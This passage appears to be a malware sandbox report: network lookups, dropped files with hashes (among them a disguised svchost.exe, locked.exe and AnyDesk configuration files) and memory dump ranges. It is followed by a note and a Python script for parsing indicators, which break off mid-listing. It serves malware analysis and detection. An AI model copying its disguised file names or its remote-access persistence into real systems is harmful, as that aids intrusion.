| US | 8.8.8.8:53 | 225.53.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.11.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.56.102.212.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 104.18.53.225:443 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| GB | 195.181.164.11:443 | edge-hls.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | b-hls-10.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | b-hls-10.sacdnssedge.com | udp |
| GB | 195.181.164.24:443 | b-hls-10.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | 11.164.181.195.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| GB | 195.181.164.11:443 | b-hls-10.sacdnssedge.com | tcp |
| GB | 195.181.164.11:443 | b-hls-10.sacdnssedge.com | tcp |
| GB | 195.181.164.11:443 | b-hls-10.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | 24.164.181.195.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| GB | 89.187.167.6:443 | s3t3d2y8.afcdn.net | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| BE | 88.221.83.202:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 24.121.18.2.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:42781 | | udp |
| N/A | 239.255.102.18:21828 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:13622 | | udp |
| N/A | 239.255.102.18:11577 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:49362 | | udp |
| N/A | 239.255.102.18:6996 | | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| GB | 18.245.187.52:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 52.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs
| MD5 | 3c37e86d3572f4f291e0bf5c9ab78e41 |
| SHA1 | 4a2617dbbba0fc65275bbacf6738d604cbfd4eae |
| SHA256 | 426f46f8c62e39fffe4e2763cf87d3b5de568b0a0179737028db0e2ed43d0e16 |
| SHA512 | 5e827131ef024f358d3fc952f8b489003568b948d0a5a24556db1aeb8b00b21a04d1f6483652bf830a5050ccc3d734b27bf385129007305a93d16d844e84303c |
C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
| MD5 | 583050ddb118acb68beb4e210b243c53 |
| SHA1 | da7a9d361cb60ebe9e767710585cfeb4d0f84444 |
| SHA256 | 10c2c130f92a90332bf66f137978ff49d88397b71f0e31a9fccbfeabc1968245 |
| SHA512 | de869a3ee8d793a42a432c12b3cc6c0a4fbd60e4713c2f5199c576841c0d6640f66f9b2ba88af97f6b5dce5498cb5387687924941f1f24db8136a8bbe4cfece5 |
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat
| MD5 | c9dc4166ceb77ae5e86ea472b989b34c |
| SHA1 | 340ee384d950b11977799791854c793e7347b091 |
| SHA256 | 223338d4ba378aa7d08dec85f046a0c56accb9fb02dd01a9876c69a428fc0594 |
| SHA512 | 8533e83302ddc866d2e41e7adcc000083537d5975668bc9ac5266dfe43f89cf384d10eeecabeb940fc69f02d80ae5a8efd5c29ff084b3ca90b4bb7e13c95c7fe |
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
memory/4348-30-0x00000000005E0000-0x0000000001D29000-memory.dmp
memory/4700-37-0x00000000005E0000-0x0000000001D29000-memory.dmp
memory/1164-39-0x00000000005E0000-0x0000000001D29000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 28ea83fde5dd58635c08a46932ddb4c8 |
| SHA1 | 63352119e647dfd887032e67ef7c7a1c150ae137 |
| SHA256 | d90e87359d02c97d81773683310a6c2437a6fc4274decfab9ee8745000f7a969 |
| SHA512 | b171a28e2c9a8711d674943ebaa291613e0617f123e0dcd842601d32399ee96e00c18007c90fc288bac35863de733137025275db14a2d6b36617b696461d4de2 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | a787c308bd30d6d844e711d7579be552 |
| SHA1 | 473520be4ea56333d11a7a3ff339ddcadfe77791 |
| SHA256 | 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440 |
| SHA512 | da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 0c04ad1083dc5c7c45e3ee2cd344ae38 |
| SHA1 | f1cf190f8ca93000e56d49732e9e827e2554c46f |
| SHA256 | 6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0 |
| SHA512 | 6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | b06492be1b4392d0d2d2e1d34353756c |
| SHA1 | 43f488020dacf58aa90d5847d0660da2e31f382d |
| SHA256 | e2fe485af23b5311cdf32417ca5b34b70a9e578fda060e8f3f7f9bbfae01a85a |
| SHA512 | a60bc46a042eb1f2918ae60d9f2179d541a32d644fe0070ba9564493e254da543122c2f8593e8ca6d846138559189c79858ca3413aaba7fcf87c6a9f1512c8d9 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | e1cf0b1986c750165cb4c78386ef0648 |
| SHA1 | a4e8187cbdf2063ff154da0dd9c91116df44bb03 |
| SHA256 | eb68970fe0ae556917beb2db2f67e93a5378aea6382215b87a8511c40fa83468 |
| SHA512 | 52ec0052e60ccd13c598d412d430e419dfa9d87cf98726bdc31285c12de6a4c2fa741c396cb4ffe4804d4a79a092114e29fa44f09fc1033e72a93b6e75317226 |
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
| MD5 | de92c167e233d22b0d6dd303189266eb |
| SHA1 | 4659aa69736505312b22a48eff5b0f5d0c3d296b |
| SHA256 | b065e0f5097158a55cd5ff02d3dfb48332b48dfb9ec7819315b33880d7e112a3 |
| SHA512 | ea6fefcef06d50af6aeacee9c1492b67bc36ec9a2fdaeeb0a9532da7794d7f31418a6f5789bd97e04139d0e413d60cb3812bd2035052c56945f849b662702150 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 4082bd2835912384e76b58a119707f4a |
| SHA1 | 276289594b693479b6c4fe0df9c3adcf73d589d9 |
| SHA256 | 6f9dc6059704ff2045bff8455c4c1ae1f0df3482310fa074fc26d209dc86dbf3 |
| SHA512 | 7117830ce477b8570054b4342be631d24b9ee850319f98d307a545b7fb45fb7a1934c7630d3683be0ea3fe16d43a8b30007586feb2a6f9183377c229d74fb6cb |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | e31aa53e5df82868677dc22fec582f4f |
| SHA1 | 4c36bdf36c88521ace6b68d5fc1d1b78ecb3432b |
| SHA256 | fbadd1d9e5cddc476efb2935e0ed9542c5ef889bb2eb2c6119919afb98e03c36 |
| SHA512 | 8544c22301f862391b7fd60f27dfc02379dfeffca3d9a2974d6ac03e78fd0b3f961ce4c99be8e27ce51ebbc9e55d8091358d620a070e06779c4e74c815efff18 |
memory/4700-141-0x00000000005E0000-0x0000000001D29000-memory.dmp
memory/1164-140-0x00000000005E0000-0x0000000001D29000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | afdc4f69f4720b8c4153f6186f49a2b6 |
| SHA1 | 329c27ea36d7913809b0c239bb58e91d2ee468ac |
| SHA256 | 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571 |
| SHA512 | 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de |
memory/5000-147-0x0000000000E70000-0x00000000025B9000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | 53104a709dd3d646ed949ab2ce114d8d |
| SHA1 | 51f72625311f8867f1da3cbd2f2a9e83bf1b32e9 |
| SHA256 | 5ba770565afd71d7e197af6df64d525a62df167666f1cad9254473405318aaca |
| SHA512 | 25b84cc0408b5079c648d9fb2a1aba70cbf4f5f6112988b995cd00ffae2ab7d7613c2472a5682c2529b7bb6077ee0c16e6e62b86c1e3f1ab2f55db779bd8aad1 |
memory/4348-189-0x00000000005E0000-0x0000000001D29000-memory.dmp
C:\Users\Admin\AppData\Roaming\enc1.mp3
| MD5 | bbb44733d6b0bd75d6a26a9a4427705f |
| SHA1 | c29d6ec521f30efb23331648a4a7a234b2db3894 |
| SHA256 | 33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507 |
| SHA512 | b846dce3ed1814e17b4f1a43910589e752e2ac911132d18275ff4d179796f1e7928a32636327a681d7c01edd704bec2efc8a12692597205bb334895c9063ceb3 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | b4c040ee0975ae7e298efaecf36d760b |
| SHA1 | a0a2a6e5421de66bb7b31391636aa122e8810712 |
| SHA256 | 15a89b575da7b48af8ef157d9fe3c174cca484f30b74c4192162ec5c1c9b8d4f |
| SHA512 | 12e5209462ebb246ffb021b27256051c23e8c9d0abd2750caa170165ee68736b30a6f8b06c010fe7c7bbb0282ffac73cb0b1e4617b4c44c032dbad81dfefea19 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 299a3d0add9586c846a4995db453c408 |
| SHA1 | 74a2f40a7446be5b6cccc1a373ec6134bf14cadd |
| SHA256 | b085c6c7919f00080efc268fafb0d1ee7f7555de061df6aa570b2ce5cb0f3010 |
| SHA512 | d2e72b3a62c93cb3340b2ee25b4dc0d67091222aa53d860d8e6948acd9640c1cae52b9faf556a86547e4e4f220b3f07eca019a53258290a669f59080df5f6dcc |
memory/5524-234-0x0000000000E70000-0x00000000025B9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 4ba0f615ae899d3af14458706041ebd4 |
| SHA1 | 2dbc3fe4624a5a44f3bc3a98b67c240f0da0726d |
| SHA256 | af1f86b5128814950c456b0b895d56269d818baa2a5de8e09dd0129056372750 |
| SHA512 | 0bd7b1c95a8242ebaa47f51855310927aa59cb605f52f3a9fc8ae5d91062fb7cfc7bcaa277a09999cbeee8bd487d40a8ee8ab636a096a2f333169670ddec472a |
C:\ProgramData\AnyDesk\system.conf
| MD5 | e64dad7b57d84ab8e5816602d53a44f4 |
| SHA1 | 576222b4467aa25c4740b705e2061800e3503c83 |
| SHA256 | 820816c2df12392f7ff15963ce6e6b1119d0a360ac740fb6ccd97c835aa1149a |
| SHA512 | 1390af4cc241d6c538860bc4d444aa5c6c22650b0e79d59064c56f7453846d6169c712a3b106a5e30c217cb493cbc16ea1861559265aa315d6998d19343e0c3b |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 9fd56e6388a08018254058517774ba23 |
| SHA1 | d04203227eb0ae65dc0a1f3857d26f54e3051ba3 |
| SHA256 | 26328e402eba779429f0752fcffdaaf3754faea2aea3df4d482778f580d63a16 |
| SHA512 | b3e6b7c3f1607ab5fcbe5bdcb47c133c1981e4fa4173b688f3cfa93694937b2d97b1f5a9d7807cbc455d8ee34757abb1afab9bb08603c9e375d0f61efaf521db |
memory/5616-249-0x0000000000E70000-0x00000000025B9000-memory.dmp
C:\ProgramData\AnyDesk\service.conf
| MD5 | a1ac576efd51e7848e490c0659aaa764 |
| SHA1 | 7d46a45e5fb31cfcd1da8299e21bdb1532e2dd24 |
| SHA256 | 40ef916c45e8856486c6413bdae3c7b30b40c72e7fa8a0ee89477ac7009f1ec4 |
| SHA512 | 114c67f536ed73cfc2cfd208211ba92a4fb271130e90279ae80623724fab259c9c91e2ee9c1e2f72002ed89a238af7240231f1cbde00e2443ebe37f3967193d7 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | ec932c86efcc80452ae4c5ca0db5c6a3 |
| SHA1 | 207b03da5659fe6b57403b5cc7390b4caf34f8ce |
| SHA256 | 0d7c255061cd8f1996bef11e9c9b3086b04f2b231db6e1ae7bfb665a93af65b2 |
| SHA512 | 98316e5362191699b202dd4c8226ca93a650c75c08e5f46a99248a985aaaecc2a6c3f1e74bd0db266d1e78bb25f5c708e397b23e0cc8a8584503c66cf02dc3c1 |
memory/5616-255-0x0000000000E70000-0x00000000025B9000-memory.dmp
C:\Users\Admin\AppData\Roaming\locked.exe
| MD5 | 6d97d6c2be27f7633da8432a5f90ccd2 |
| SHA1 | 5ffca0110e122848b772e563f74c057d7f782664 |
| SHA256 | 47b78d957e366dbf484d44bca911f41a7a795309e0d3e4c9d08fdc135efbb77a |
| SHA512 | 518e5678a7631258f2373d7f76987f668531e972e04d5bdbdf8aacb2e2a568af618b1e4f338a289edf11e419cc6b4813e95c4433e0e849243d10e10a895cbfce |
memory/776-266-0x0000000000E70000-0x00000000025B9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 5d22282e21e819c188c9a5153e785903 |
| SHA1 | 61b90af93d494d264237bd14992d6fef0bd30a38 |
| SHA256 | d656c77dfb123675b5eba3768fc995df40648f9b401fcbe69e2c5f1a219994d5 |
| SHA512 | 461faf743750848e824ef91b430697310279f8ef164465aa4f2793f044cda950896e733f83d97cd500956692e0b323f8f4d369fa77ae29e7f65b33bc6589bb4b |
C:\ProgramData\AnyDesk\system.conf
| MD5 | a76627edf8de4838a8acd7a0fac60c37 |
| SHA1 | 719ae0a6605b7df5dd2f64c868ab5b2cf6ad0b57 |
| SHA256 | 01c5f9ba4628a54c5099dddedee57ca6bff5a77ccfc993bdccfd755d4af2f4ca |
| SHA512 | 5162218b7f15f3c47805bbf768ed85659659961045a783179d88cea07c84e4a7e037cdf8c5083a096141fc8cef70da36b63c107a6f7e02d72a512c188f7689eb |
C:\ProgramData\AnyDesk\service.conf
| MD5 | a979dc84ede87fd1c06d6fd5a9555111 |
| SHA1 | 8d25834eb4fac819561008aa8a945b99af960f45 |
| SHA256 | c4e764a4b98886aa2a0a5296b57eee9cb25237bd8e995c6487b1336151ea4931 |
| SHA512 | d7af4d901fbcf47c9236b948b8cf1703da77b39c260421c6696845ed9e27ad090fb1c7acebaacd0c574143a7b6db901f6411ef12996bb16f2924258fd06bac77 |
C:\Users\Admin\AppData\Local\Temp\2362.tmp\2363.tmp\2364.bat
| MD5 | 4c8f4515dd2087309a35099fe2fffa35 |
| SHA1 | e75acce86a90f2996dc28a1de705cb708d753b37 |
| SHA256 | 90a8a7ffa3265396f7d69509ef5652ef8bc69e241d4b63cdeca1baee1fa1fea6 |
| SHA512 | 8699e45bf3ae83d60f913dcad302dfb8de3267cdb1fe6fa8813ea9c7c2c54d9b8bc9798dbcdcf9f1c4438f06226bf5e036a421d66892e9447722f434d08aa1d9 |
memory/776-274-0x0000000000E70000-0x00000000025B9000-memory.dmp
memory/5488-280-0x000001D41EBE0000-0x000001D41EC02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nqupw5xj.y2a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\users\Admin\downloads\stn.exe
| MD5 | 5a1f7251dc370ebecd121ec50c3c7687 |
| SHA1 | 63e672099264cdaecb7b23e9533da2e52e819de5 |
| SHA256 | ced26842f55378cc57ca36f3ae366b59e96eeb5a8a0abbc000eb72f16df01ee8 |
| SHA512 | afe17a4bf0e511c40072cb614ef619f10eaec878538299223946231658c4da1f7e652ca3b1dfe848da2ff8b17d8a47cfd9c76f6b35fee3a488b7407bb82be493 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
C:\Users\Admin\AppData\Roaming\doorbell2.ahk
| MD5 | d61c68849186eb9dbea169cceb79c2a6 |
| SHA1 | baca62e884a3d7dccae18ef64096db4d562def39 |
| SHA256 | 6c4daf8ef0da2cf0ac079637a5c3062a610c4c710c7e4c55eedd1b010337bb1e |
| SHA512 | deec0d4cb912d64db281459e8d01b21583fd7df3c46ea02cb66fffb5378ac6e1f375cb18f30ddccd908fc0c98d14094ea1620699f93498fc8c7be579a3a5d0b0 |
C:\ProgramData\svchost.exe
| MD5 | 195594bf561f51edd8f766783b8c4791 |
| SHA1 | 4be31254244e495bcb85b7dfcde98ca6be8789a0 |
| SHA256 | 57a5abd41f0b9e52dc6390cecbe9caf1a6f2bbc73a9baba61a0fd57c7eb9e52a |
| SHA512 | 4a0df7637351a649458bae2b20a3317cb40b82ff03e4c53900b581a553626bf270f716d4deae19af86984012dfe22f5d92f5172ac1e6794c1956a792602123cc |
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\users\Admin\downloads\conhost.exe
| MD5 | 3f609615628633f1ff84e6e73ed31ec0 |
| SHA1 | 0015273fd5533b876b69dbbb1a0257b8f491c11f |
| SHA256 | 4fb9a00c6e3f24ac9cd7f171e1ffe1dcf3aecbe62defea080cd791c54767e2b4 |
| SHA512 | fc40a832de74166b21bc79f71947d053d3dfa5da87e5a0412349adf115955d09e078fa3849085d7afc1c3e537f6be83b88df235ba4cdf127e7d6e0406bf2d7a1 |
memory/5848-331-0x00007FF70C750000-0x00007FF70C848000-memory.dmp
memory/5848-340-0x00007FFCCBC90000-0x00007FFCCBCA1000-memory.dmp
memory/5848-348-0x00007FFCCB910000-0x00007FFCCB92B000-memory.dmp
memory/5524-330-0x0000000000E70000-0x00000000025B9000-memory.dmp
memory/5000-329-0x0000000000E70000-0x00000000025B9000-memory.dmp
memory/5848-352-0x000002D106CA0000-0x000002D106CB2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e5ea61f668ad9fe64ff27dec34fe6d2f |
| SHA1 | 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b |
| SHA256 | 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466 |
| SHA512 | cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34 |
memory/5848-349-0x000002D107BA0000-0x000002D10940F000-memory.dmp
memory/5848-351-0x000002D106C80000-0x000002D106C91000-memory.dmp
memory/5848-347-0x00007FFCCB930000-0x00007FFCCB941000-memory.dmp
memory/5848-346-0x00007FFCCB960000-0x00007FFCCB971000-memory.dmp
memory/5848-343-0x00007FFCCB9A0000-0x00007FFCCB9C1000-memory.dmp
memory/5848-345-0x00007FFCCB980000-0x00007FFCCB991000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d07f5f735cdea1655d0a91c8ee2e1f85 |
| SHA1 | 466d2b3e488ccd0bc22d67728769ff7d911e972b |
| SHA256 | eb067e633d59da091a04f4d5a0175f79c8cef4ee6c50a049ad229ed7528d9c81 |
| SHA512 | 54d6737e448ae5b7b3b160a099be9a52d4db664553f9b44bfa5d2722325989360655b46423d80ec36120cbb65ec875debc5e91f8f2af04a36d33e6ae22d91f16 |
memory/5848-344-0x00007FFCCBC20000-0x00007FFCCBC38000-memory.dmp
memory/5848-342-0x00007FFCCBC40000-0x00007FFCCBC81000-memory.dmp
memory/5848-341-0x00007FFCBC570000-0x00007FFCBC77B000-memory.dmp
memory/5848-339-0x00007FFCCBCB0000-0x00007FFCCBCCD000-memory.dmp
memory/5848-338-0x00007FFCCBCD0000-0x00007FFCCBCE1000-memory.dmp
memory/5848-337-0x00007FFCCBF10000-0x00007FFCCBF27000-memory.dmp
memory/5848-336-0x00007FFCCBF30000-0x00007FFCCBF41000-memory.dmp
memory/5848-335-0x00007FFCCBF50000-0x00007FFCCBF67000-memory.dmp
memory/5848-334-0x00007FFCCC0D0000-0x00007FFCCC0E8000-memory.dmp
memory/5848-333-0x00007FFCBC780000-0x00007FFCBCA36000-memory.dmp
memory/5848-332-0x00007FFCCC490000-0x00007FFCCC4C4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Users\Admin\AppData\Roaming\doorbell.ahk
| MD5 | 952ea1033b5f83c25ce5133944e4a65d |
| SHA1 | 9f50c5a2fb4aee93d154758c66d9ca81fd5fe3c5 |
| SHA256 | 163b07a09d117ff1bdeb20ed83c1ebfb0917ce72ec63d32b4b6f8f87902f604a |
| SHA512 | b500ceadee155d4f5e39348e205ce8339605732e82564545c04c9ac2a718ea7135fdc37ee8b3f60d035d26fae114022f04efd57e2cc9feb1231e18051c307785 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cae60f0ddddac635da71bba775a2c5b4 |
| SHA1 | 386f1a036af61345a7d303d45f5230e2df817477 |
| SHA256 | b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16 |
| SHA512 | 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 09c40d1a114dc5a068e680ab67a5824c |
| SHA1 | 3c9d360d5c34638e4e3de3417c7f7f1b47e48eee |
| SHA256 | b159c5c30b0f5143289d8c655f7fa9ecc04d102e5a5ce760772309c1892175a7 |
| SHA512 | 795244bf21786e16a2f4843db7db27bc938d25fe50fa71665163fe55f65de6cfae5e7351dc3779291205541379a47726e13081ae7e1dbde89742f47e94eef602 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a9a9b8c327fc89d4b2e03cf7d8f0cca4 |
| SHA1 | b31953075db379e188400242985db5672df9e4ad |
| SHA256 | 8fdb37310ee7035cab6966aad39c8db7d0e5bc117e0b5f0fa97aff8cbcc4a1ce |
| SHA512 | a6bd79b3fdaba75408091629d0b6bc306a01b4701bddb87101b5259f15b7805fd45248a7ca90172062cf8bf207e2117a25099ceeede7a15b0ad762c75f27a7c7 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 99f781eb1d61bcb5fd6c77ced667fd47 |
| SHA1 | 4ca95de59e3b952ea8b640cc5f9f5d26b2055af3 |
| SHA256 | 5cebb7a97ca8255bc1e3667ab3ca2ec996b89a1f8d02c8a92dae3ca9cc6e47d0 |
| SHA512 | da43c3750f50ee3eec255af8f3146efa3bcacd1b6e8c7141bc517c48321869ec453b2d18d48ed19845d2758f8d0c2bc7eff07745ebff63f474199ef3070b9d88 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | accb531e589ed0273a14babbd5b3c80d |
| SHA1 | 67e28633d5e7d181fe9888e8f5849cef0b08cb83 |
| SHA256 | 52af42098293b07d2bb7105b3af93fd131c319f803bf4d557984f34161522bd2 |
| SHA512 | 82546db0a98edb6a5e8666459c9bfeeedb4153497fcb1681d14988c3161bd266d340b19efecc165eb69712e8345a4fc7cfb9105263cb46c1d94a4ccf27078c6b |
C:\ProgramData\gcapi.dll (zero-length file: the digests below are the well-known MD5/SHA1/SHA256/SHA512 of empty input, so they identify nothing and must not be used as indicators)
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
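The dropped-file listing above is the raw material an analyst turns into indicators, and it carries three traps that a mechanical hash export misses: the same path is written several times with different content (the AnyDesk system.conf and ad.trace entries), one entry has the digests of an empty file (gcapi.dll), and the memory dumps repeat one identical address range across several PIDs. The script below is an added example, not part of the sandbox report and not the sandbox vendor's tooling; it parses a constructed excerpt in the shape of the listing (paths and digests copied from the entries above, SHA512 rows omitted for brevity), recomputes the empty-file digests with hashlib rather than hardcoding them, and reports rewritten paths, empty files and memory regions shared between processes. Function and variable names are the author's own.

```python
import hashlib
import re
from collections import defaultdict

# Constructed excerpt in the shape of the report's dropped-file listing.
# Digests are copied from the entries above; the set is deliberately small.
SAMPLE_LISTING = r"""
C:\ProgramData\AnyDesk\system.conf
| MD5 | 53104a709dd3d646ed949ab2ce114d8d |
| SHA1 | 51f72625311f8867f1da3cbd2f2a9e83bf1b32e9 |
| SHA256 | 5ba770565afd71d7e197af6df64d525a62df167666f1cad9254473405318aaca |
memory/5000-147-0x0000000000E70000-0x00000000025B9000-memory.dmp
memory/4348-189-0x00000000005E0000-0x0000000001D29000-memory.dmp
C:\Users\Admin\AppData\Roaming\enc1.mp3
| MD5 | bbb44733d6b0bd75d6a26a9a4427705f |
| SHA1 | c29d6ec521f30efb23331648a4a7a234b2db3894 |
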